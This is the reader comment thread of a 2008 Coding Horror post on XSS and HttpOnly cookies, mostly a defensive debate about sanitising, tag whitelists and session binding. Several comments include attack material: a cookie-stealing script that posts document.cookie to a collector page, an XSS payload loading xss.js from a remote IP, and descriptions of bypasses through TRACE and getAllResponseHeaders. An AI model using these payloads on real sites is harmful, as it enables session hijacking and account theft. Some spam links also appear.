<pre></pre>
<code></code>
Don't allow ANYTHING fancy in between the angle brackets. No attributes. No styles. No quotes. No spaces. No parenthesis. Yes, its strict, but who cares?
Being helpful is a security hole.
bex on August 29, 2008 11:14 AMhehe.. I recall raiding a certain social networking website (none of the obvious). someone in the channel we were in found a lot of XSS vulnerabilities. used the same setup described in this blog, plus I recommended a similar FF extension, Modify HTTP Headers. Pretty good read, unlike the past entries...
Anon on August 29, 2008 11:27 AM> You don't sanitize input: you FRIGGING REJECT it!
And if the requirements of your application include the ability to accept such input... then what do you suggest? I just love how programmers think that they get the final say when it comes to functional requirements.
"Hell, users don't need to be able to enter single quotes anyway. If I strip single quotes out of the input then my crappy anti-SQL injection code hack will actually appear to work sometimes."
Matt on August 29, 2008 12:16 PM@bex
"A proxy means multiple usernames sharing one IP. That's totally fine."
What I think O'malley was talking about is large ISPs (e.g. AOL) who may push their users through a different proxy IP on every single request. These are the users you'd be screwing over. A few large European ISPs do this too.
With AOL, they maintain a public list of those proxy subnets (http://webmaster.info.aol.com/proxyinfo.html) so if it's an issue you can make your application treat all those IP addresses as one big IP. None of the other ISPs maintain such a list though, so those users would continue to get screwed.
Your method does add some extra protection but it inconveniences a lot of users. In any business I've worked in, kicking out all of AOL is not something management will allow. And the places where you need the security the most (e.g. online banks), that's just not an option.
The amount of protection you're adding is debatable too. You're still allowing people behind the same single proxy IP to steal each others sessions. And at some ISPs, that can be a hell of a lot of people.
I'm not sure the tradeoff for pissing off a bunch of other customers is worth it.
A better approach, depending on your application, is to require re-entry of the user's password for critical actions.
It really depends on the application though, and what's at stake. Dealing with a stolen session ID at a pr0n site is different to dealing with one at a bank.
correct on August 29, 2008 12:18 PMYour JavaScript from the remote server is hardly ideal. Here is some better code I developed while researching this security issue. In order to create a deliberately vulnerable ASP.NET page I had to use two page directives: ValidateRequest="false" and enableEventValidation="false"
jscript = document.createElement("script");
jscript.setAttribute("type", "text/javascript");
jscript.setAttribute("djConfig", "isDebug: true");
jscript.setAttribute("src", "http://o.aolcdn.com/dojo/1.1.1/dojo/dojo.xd.js");
document.getElementsByTagName('head')[0].appendChild(jscript);
window.onload = func;
function func() {
dojo.xhrPost({url:"http://localhost/study/php/cookie-monster.php", content:{u:document.links[0].innerText, l:document.links[0], c:document.cookie}});
}
As others have pointed out, scrubbing input data is not the correct approach. Here's why:
1) The way data needs to be scrubbed depends on the context of how it is going to be used. You can't know up front how the data will ultimately be used to you can't make the proper decision of how it should be scrubbed when it is entered. For example, the OWASP sample scrubber routines distinguish between data that is going to be output as JavaScript, HTML Attributes, and raw HTML (as well as a couple others).
2) You can't guarantee that all data that ends up in your database will have come through your input scrubber. It can come from another compromised system, sql injection, or even flaws in your own input scrubber.
3) Once you find out that XSS data exists in your database it is nearly impossible to fix. For example, if you find out that your original input scrubber was flawed you now have to figure out how to get rid of all of the problem data. If you use output scrubbing instead of input scrubbing you can simply alter your output scrubber and leave the data alone. Always assuming that the data could be bad means that it can stay bad in the database without impacting the application.
4) There is no reason to scrub data more than once. You have to do it on output anyway for the reasons listed above.
5) Other systems are likely to need the data and will puke if it is already scrubbed. Even if you don't interface with any other systems now you never know when your boss is going to come to you and say that his boss wants to be able to run some simple queries using Crystal Reports in which your scrubbed input data can't easily be unscrubbed before use.
6) Scrubbed data can mess up certain types of SQL statements. For example, depending on your scrubbing mechanism, sorting might be broken. Like clauses may also not work correctly. You want the data in your database to be in a pure unaltered form for the best results.
These are just a few reasons. There could be many more.
dood mcdoogle on August 29, 2008 12:56 PM<script>alert('hello XSS!');</script>
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
just kiddin...
Kwan on August 29, 2008 02:48 PMJeff, what sites did you use to guide you through making StackOverflow XSS resistant?
I am about to embark on a side project and would like to make the site XSS hardy.
@correct:
Assume the IP address changes. This means either malice, or a ISP with a rotating pool of proxy IP addresses. Either way, you need something stronger to fix this.
You should re-challenge for non-password information (secondary password, favorite color, SSN, phone call, whatever). Then walk them through secondary authorization with SSL certificates... like myopenid does.
@Matt:
> And if the requirements of your application include the
> ability to accept such input... then what do you suggest?
> I just love how programmers think that they get the final
> say when it comes to functional requirements.
You love odd things... and I already took that into account. Read this article about what Jeff is doing, and you'll see my proposal fits in fine with the functional requirements:
http://www.codinghorror.com/blog/archives/001116.html
Offhand... I can think of no good reason why a non-trusted user should be allowed to use more than 5-10 "safe" HTML tags. If I'm wrong, I'd like to see what you think the requirements are.
bex on August 29, 2008 03:00 PM@bex: "Offhand... I can think of no good reason why a non-trusted user should be allowed to use more than 5-10 "safe" HTML tags. If I'm wrong, I'd like to see what you think the requirements are."
Name them. I will bet you a contrite apology that someone will add an 11th that they'd want within 5 minutes.
Tom on August 29, 2008 03:11 PM@bex
Did you just tell me exactly what I told you, but like you thought of it yourself? Yeah, you did.
correct on August 29, 2008 03:28 PMYou really want something the equivalent of Perl's taint-checking on input, but adapted to different classes of data.
This might be a good project to try out the idea Ragenwald (Reg Braithwaite) was kicking around a while back in the context of Haskell/ML strongly-typed languages:
Create distinct derived types of strings for data which comes from various contexts and data which may be put into certain contexts. For example, you have UntrustedString and its derived classes UntrustedHeaderValue and UntrustedFormInput. You have a distinct type family of strings for stuff to store in the DB, DBSafeURIString, DBSafeNoHTMLString and DBSafeValidatedHTMLString, and another family for things which may be output back to the browser, for instance StringWithNoHTML, and URIEncodedURIString, and FormattedHTMLString.
You then make your validation functions return these very specific types, as appropriate for what they do, for instance accepting a UntrustedFormInput and returning a DBSafeNoHTMLString, and you let the compiler help you spot, for instance, that you are taking UntrustedFormInput and trying to directly store it as a DBSafeNoHTMLString, or are using a DBSafeValidatedHTMLSTring in a display function which expects a StringWithNoHTML.
Just saying "I'll HTML-encode all inputs before I store them" doesn't necessarily make anything safer; it's all context dependent. Maybe you HTML-encoded it but you needed to URI-encode it, or vice-versa. Or maybe you just forgot. This doesn't help with the specific problem here of just failing to screen some of the cases you need to validate, but in theory it should help. (Never tried it.)
Clifton on August 29, 2008 04:40 PM@correct:
Sorry if I didn't give you sufficient credit ;-)
My point was less about re-auth in general, but more about trying to detect who had a legitimately rotating IP address. If detected, cookies can't be trusted... so force the user into an auth scheme that used cookies as secondary to something else. Primary would be SSL Certs or (shudder) Basic Auth over HTTPS.
Thoughts?
@Tom
Here was the list I initially had:
That's probably good enough for anonymous comments. These ones are also safe and useful for untrusted comments:
That's 9 tags. If you want to add a video or an image, you could use a bit of DHTML or Flash to pop up a "media selector" widget for "approved sites": Flickr, YouTube, etc. People get to select URLs to pages, but that's it. On the back end, check the URL to see if it looks hacked. If so, reject it.
For "trusted" contributors, you could open it up even more and use tables, headers, links, etc... in which case you're looking at closer to 20 tags.
For "very trusted" contributors, you get to use attributes like SRC for IMG, and maybe even SCRIPT nodes.
Of course, @dood mcdoogle summed it up quite well when he said that input filtering cannot ever be sufficient... so you always need an output filtering step. However, there's no harm in pre-parsing your data and teaching your audience what will and what will not be tolerated.
bex on August 29, 2008 05:52 PM@Tom
My tags got gobbled... I these are critical for anonymous comments:
B, I, UL, OL, LI, PRE, CODE, STRIKE, and BLOCKQUOTE
Anything else, and you probably want to be a "verified" or "trusted" user.
Friends dont let friends allow XSS attacks.
When you emit a session id, record the IP. Naturally you also emitted it over ssl, in which case you record the cert they were granted for the session. Therefore each request is validated by IP and cert?
Nick Waters on August 29, 2008 08:43 PMOnce again an example, that shows that you should never (ever!) use cookies to secure a site
Jack on August 30, 2008 12:00 AMPretty neat solution. But this way, you are restricting the use of the cookie to HTTP. So you can't use the cookie client side AND via XmlHTTPRequests...
So basically, why does one need a custom cookie? Why not just put the value in the ASP.NET Session? Like this:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2008 10:51:08 GMT
Content-Length: 2838
I'd like to seek someone crack my PHP HTML sanitizer ...
htmlspecialchars( $string , ENT_QUOTES )
;)
Smart Asp on August 30, 2008 02:52 PMIs good to know that we rails developers are well covered...
$ ruby script/console
Loading development environment (Rails 2.1.0)
>> text = '<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"'
>> include ActionView::Helpers::SanitizeHelper
>> sanitize(text) => "<img src="" /><img src="" />"
:-)
LOL it's so funny how you take any opportunity possible to show that Microsoft's software is better than the alternatives.
Henry on August 30, 2008 06:47 PM@Emmanuel
Neat-o... does Rails have an automated script to test all the known XSS attacks on ha.ckers.com?
I wouldn't be surprised if one or two slipped by...
bex on August 31, 2008 09:02 AMGood post.
You'll find this technique though will help but it does not solve the underlying problem.
<a target="_new" href="http://www.dragonlasers.com/">Laser Safety Glasses For Raves!!!</a>
Sod
I'm a fan of HttpOnly - http://www.guidanceshare.com/wiki/ASP.NET_1.1_Security_Guidelines_-_Cross-Site_Scripting
J.D. Meier on September 1, 2008 03:13 AMSeveral questions have come up
Why was HttpOnly implemented by Microsoft on IE6 first
Why is HttpOnly broken on Firefox
Why is it not on all browsers
Why is it not on as standard
All of these have one answer - it is a patch to fix a symptom of bad coding and not a solution
It fixes (or partly fixes) one security hole out of a huge number, it is not a universal fix ...
You should sanitize properly everything from the user or you will have a security problem ...
Jaster on September 1, 2008 04:37 AM> I'd like to seek someone crack my PHP HTML sanitizer ...
Google for "htmlspecialchars vulnerability"...
giggles on September 1, 2008 07:11 AMAlready pointed out but just to show more practical way to bypass HTTPOnly cookies take a look at XSS Tunelling - http://labs.portcullis.co.uk/application/xss-tunnelling/xss-tunnel/
Basically it's a defense in depth approach and quite cheap to implement but obviously not the silver bullet.
FM on September 1, 2008 09:27 AMCan't people edit cookies no matter what? They are all stored in a file somewhere on a computer, so people (especially) in linux, for example, could edit this file through terminal (assuming it's read only for normal users), and easily edit the cookies.
Jon Neal on September 1, 2008 10:20 AM@correct you missed the point entirely and I have a hard time believing that you read what I had to say. Then again I think your comments been sanitized because I find your latest response barely intelligible. Command-line escaping? wtf?
@bex and others, you can't, from today's web servers, have enough information to detect all spoofed attacks, even with encrypted cookies. Buy a good stateful router/firewall, that's my only point.
Also, you don't just need to worry about XSS. You also need to worry about anything else in between you and a web site that steals cookies. If your friend next to you can steal your cookie, he can 'replay' an action and pretend to be you.
Also, can anyone explain why the ajax double-cookie is any sort of remedy? Maybe I'm just thick, but I don't why it's a silver bullet.
Also, if you only send authentication cookies over https, and never in plaintext, would xss exploits be able to steal them?
O''Malley on September 1, 2008 07:34 PMWhy the insistence that IE7 is less broken than Firefox in regards to HttpOnly? I see the same bug in both at http://ha.ckers.org/httponly.cgi
Dan Veditz on September 1, 2008 08:55 PM@omalley:
"@correct you missed the point entirely and I have a hard time believing that you read what I had to say."
I read what you said.
"Then again I think your comments been sanitized because I find your latest response barely intelligible."
I'm not surprised.
"Maybe I'm just thick"
...
Re: validating IP - as others have mentioned, the assumption that "changed IP" == "attempted hack" will run into false-positive problems on users from some banks (and perhaps other large companies / AOL users / whatever, but I'm sure about the banks). It's unfortunate.
Now they'll have to copy the html of the login screen with the expired session message and have their javascript output that instead of stealing the cookies.
David on September 2, 2008 11:57 AMSo, where's the post on what exactly was wrong with the html sanitizer and how exactly you fixed it? Or is that too narrow focus for the blog. :)
Debt Consolidation on September 2, 2008 12:31 PMThe only secure computer is on that is unplugged and (in the case of a laptop) then battery has been removed.
Hell, there even claiming now that microwaves at a specific frequency and intensity can affect the ole analog 'wet' computer...
mac on September 2, 2008 12:35 PMWouldn't...
XMLHttpRequest.prototype.__defineGetter__('getAllResponseHeaders', function(){ });
be a good workaround for Firefox's issue?
Sean on September 2, 2008 11:47 PMI think what you should implement is explained clearly in the following paper:
http://www.cse.msu.edu/~alexliu/publications/Cookie/cookie.pdf
It's actually not that complicated. URL encode everything. so for example <b> becomes <b/>, etc... then selectively use text substitution to reenable what you want, i.e. '<b>' => '<b>'
Everything else remains escaped
Tony
Tony BenBrahim on September 3, 2008 11:08 AMThere seems to be a huge emphasis on cookie stealing, but don't forget that XMLHttpObject is extremely dangerous since it can mimic any user action! What if an XSS script loads the user profile form, changes the email address, and then requests a new password be sent to it (via the common "Forgot password" form)? The account is hijacked without even touching a cookie. Place additional security around these sensitive areas and do not rely solely on the HttpOnly directive.
Jonah on September 3, 2008 12:34 PM>>> It's a difficult scenario, because you can't just clobber every questionable thing that comes over the wire from the user.
You do.
mbhunter on September 3, 2008 01:25 PM@Jonah hits it on the head. There's always a way to hijack a session, even if it's walking up to an unattended computer. Any critical / costly action should require the user to retype their password (or some secondary authentication method).
At least HttpOnly can try to limit what browser scripts can do, and it's a step in the right direction, but as others point out, it's not yet a total fix.
Another fix I can think of would be if running script couldn't load other scripts on the fly (ie via eval), and your web framework would inspect every pages output and remove any scripts references / and perhaps even not allow inline scripts, you could be a lot safer.
Unfortunately there are a lot of vectors of attack, and it's currently very easy for a developer to screw up.
not correct on September 3, 2008 01:55 PM@ Jonah, I think you're right - when making profile changes etc a password should always be required. Good point indeed.
I'm looking at implementing commenting etc on my site (its a blog, but I don't care too much about the parsing of the blog entries since I'm the only one making them). I was wondering where the author stated that you can't clobber every questionable thing that comes through - Why not? I was thinking of just parsing all angle brackets to their entity codes and then running through the script to look for acceptable tags, but instead of looking at tag letters between and brackets, I'd look at letters between entity codes.
Is there anything glaringly wrong with this approach? Script stuff wouldn't get through because I would only allow specific tags such as strong, em, u, strike etc.
Nick Coad on September 3, 2008 06:15 PM@bex: "B, I, UL, OL, LI, PRE, CODE, STRIKE, and BLOCKQUOTE"
If you expect your users to want BLOCKQUOTE, UL, and OL, you should probably be using a smarter text markup language (MediaWiki-esque) in the first place. ISTR Jeff was considering this route for stackoverflow a while back, but rejected it.
My list of HTML tags needed in this blog comment section: P, B, I, S (and possibly STRIKE), (might as well throw in U for completeness), TT (or CODE), PRE, A HREF (with obviously well-formed URLs only). A NAME is too abusable. SMALL might be nice, but it's abusable. BIG is too abusable.
Anonymous Cowherd on September 3, 2008 06:28 PMRE Another fix and "remove any scripts references" I neglected to say the web framework would remove any script references "that you didn't explicitly allow", which outside of DNS poisoning would pretty much nail the coffin around many XSS.
Then again, it's all a giant band-aid as everything is sent plain-text. It takes only 1 compromised router.........
not correct on September 3, 2008 06:40 PMI had not that much clue about cookies. This article has opened alot of things for me. Thanks buddy.
Web Programming on September 4, 2008 02:02 AM"pick a schedule and stick to it"
Is this blog dying?
me on September 4, 2008 02:46 AM>Robert C. Barth said: "Why not keep a dictionary that maps the cookie >credential to the IP used when the credential was granted, and make >sure that the IP matches the dictionary entry on every page access?"
>I'm surprised this isn't a standard practice... is there some gotcha >to this I haven't thought of? I'm not a web developer myself, so there >could be a simple "yeah but" to this solution.
The problem with this is users with a fast switching dynamic IP would be continuosly prompted to login again.
Tony on September 4, 2008 05:28 AMWhere are the new blogs!!! I am getting antsy =) just wondering
Kyle Woodbury on September 4, 2008 09:05 AMI wouldn't worry about users with fast switching dynamic IPs. They have a bigger issue that'll plague them until they find a real ISP.
David on September 4, 2008 11:59 AMI second Kyle, I have been waiting for the latest in hackery... And I am getting rather im-patient. Sorry, but I love this blog.... A lot...
Braden on September 4, 2008 08:08 PMoh cool, this information is really useful and definitely is comment worthy! hehe.
The Planes on September 5, 2008 01:19 AMNice blog, I'm glad to find it. I would not mind if it would be updated every day - thank you for good advices.
Mina Jade on September 5, 2008 03:54 AM(crickets chirping)
Shmork on September 5, 2008 11:42 AMAgreed, I checked the page directly encase my Google tool had broken (again). Must be really enjoying the Labor Day weekend.
Matt Ridley on September 5, 2008 12:33 PMWhere are you Jeff??????!!!!
How come you average a good 16-20 posts a month for 4 years and as soon as I start reading, it drops to once a week? So far I'm contenting myself with trawling through back issues, but, you know. When will normal service be resumed? What about Mr Post Often Post Regular?
> How come you average a good 16-20 posts a month for 4 years and as
> soon as I start reading, it drops to once a week? So far I'm
> contenting myself with trawling through back issues, but, you know.
> When will normal service be resumed?
I guess you haven't worked your way up to the August 24 post:
> You may have noticed that my posting frequency has declined over
> the last three weeks. That's because I've been busy building that
> Stack Overflow thing we talked about.
*More Crickets Chirp*
Simucal on September 5, 2008 02:47 PMI see a lot of comments wondering where Jeff has gotten to. Well, I think it's a tad unfair and unrealistic to expect him to be able to post numerous times per week for the rest of eternity. I'll happily keep checking back each day until a new post appears :)
I'm sure normal service will resume, he's probably busy at work, or if not, having some much deserved time to himself.
Alasdair on September 6, 2008 06:05 AMWell it seems pretty likely that he's trying to put off his next post until it can be the debut of Stack Overflow.
Which, you know, I'm actually in favor of. Looks like a useful site, from the screenshots I've seen.
But it's been now well over a week since the last post. Obviously things are taking a little more time than he thought. Which again, I understand -- how many times have we all been in that position where we're JUST about ready to send something off and, oh, there's a little bug here, and oh, just gotta remember to fix that up here, and oh, CRAP the whole thing is falling apart now, and oh, damn damn damn, and oh....
But come on Jeff! We're your lifeblood here. We are your base! Throw us a bone. Most of us aren't in on the Beta so we're just sitting here with a dead blog, and the "coming soon" page on stackoverflow.com is pretty uninspiring. We got nothing! If it isn't a sure thing that you'll have something spectacular soon (as in, by Monday), at least just give us a little head's up, something to gnaw on...
(Unless, of course, Jeff has been hit by a car or some other unforeseeable tragedy. In which case I eat my hat.)
Shmork on September 6, 2008 08:24 AM"(as in, by Monday)"
rofl
don't go getting too big for your boots!
Shdick on September 6, 2008 02:03 PMp.s. jeff did you ever make a webapp before? your last few posts have been a bit.. entry-level.
Are you dead?
Dave on September 7, 2008 02:15 AMI'm just makin' suggestions, not demands. It'll be almost two weeks without a peep if it goes much longer...
Shmork on September 7, 2008 05:24 AMSeems to me like the perfect time for a post about maintaining relationships with your clients. Stack Overflow may become a success or might fail, but you've become a name by providing regular posts on codinghorror.com. Now you are moving on to bigger and better things you should not neglect the people who have afforded you the opportunity to make this your career choice.
Your posts of late have been infrequent and in all honesty not up to your usual standard. We, your readers, are still here. But we won'#t be forever.
Jeff, say something....
Niyaz PK on September 7, 2008 10:56 PMIf you're able to forget to HTML-encode some user input, you're probably also just concatenating strings of text. If you build your pages using proper XML tools, there is no conceivable way that you can accidentally include unsanitized user input in the page.
clockwork on September 9, 2008 04:07 PMWell, judging from the new post the mystery of Jeff's absence is seriously solved.
DennisSC on September 13, 2008 03:49 PMBesides the fact (which you mention) that you can still perform other, non-cookie-related XSS attacks, there is another way to bypass httpOnly protections, regardless of the browser - using XSS to do Cross-Site Tracing (XST) attack.
If the server supports the TRACE method, the malicious script can send a TRACE request and parse the response (which will contain the cookie).
Worse yet, even if the server does not support TRACE, but one of the proxies on the way does (can be reverse proxy, or even the user's organizational proxy), XST can still be accomplished by sending the TRACE request to the proxy...
BUT regardless of XST, I still highly recommend using httpOnly. At least it will block non-XST attacks...
This blog post is wrong on one key issue - ie7 is still very vulnerable to the XMLHttpRequest exposure of HTTPOnly cookies via response headers.
The fact is, the only browser that locks down this vector is ie8 beta - but FireFox 3.1 will surely lock down this vector. https://bugzilla.mozilla.org/show_bug.cgi?id=380418
The latest version of ie7 (as of this writing)7.0.6001.18000 still exposes HTTPOnly cookies via set-cookie headers in XMLHttpRequest.getAllResponseHeaders()
Jim Manico on September 24, 2008 04:37 PMThe latest version of ie8 beta 2 (as of this writing)8.0.6001.18241 also exposes HTTPOnly cookies via set-cookie headers in XMLHttpRequest.getAllResponseHeaders() - FireFox 3.1 is on track to support this hole, see: https://bugzilla.mozilla.org/show_bug.cgi?id=380418
Jim Manico on September 26, 2008 07:27 PMthanks you.
Hikaye on September 27, 2008 04:24 AMA coincidence?
http://news.cnet.com/8301-1009_3-10056854-83.html?part=rss&subj=news&tag=2547-1_3-0-5
t on October 2, 2008 02:58 PMnice tips but i'm still confused how to use this
qoyyim on October 11, 2008 03:03 PMI'm new to PHP and recently setup my local machine with PHP and MySQL for doing development. I was sort of stuck when I needed to post my work for the user to test and review. After looking around a bit I found a site that hosts PHP and MySQL apps. I was surprised that it was free - it seems they're offering the service at no cost until 2012. At that point they'll change over to a fee-based service. However, in the meantime, it's a great place to do anything from demo and sandbox right up to posting sites for real.
Their pitch is as follows:
"This is absolutely free, there is no catch. You get 350 MB of disk space and 100 GB bandwidth. They also have cPanel control panel which is amazing and easy to use website builder. Moreover, there is not any kind of advertising on your pages."
Check it out using this link:
http://www.000webhost.com/83188.html
Important: There's one catch in that you must make sure you visit the account every 14 days - otherwise the account is marked 'Inactive' and the files are deleted!!!
Thanks and good luck!
| Content (c) 2008 Jeff Atwood. Logo image used with permission of the author. (c) 1993 Steven C. McConnell. All Rights Reserved. |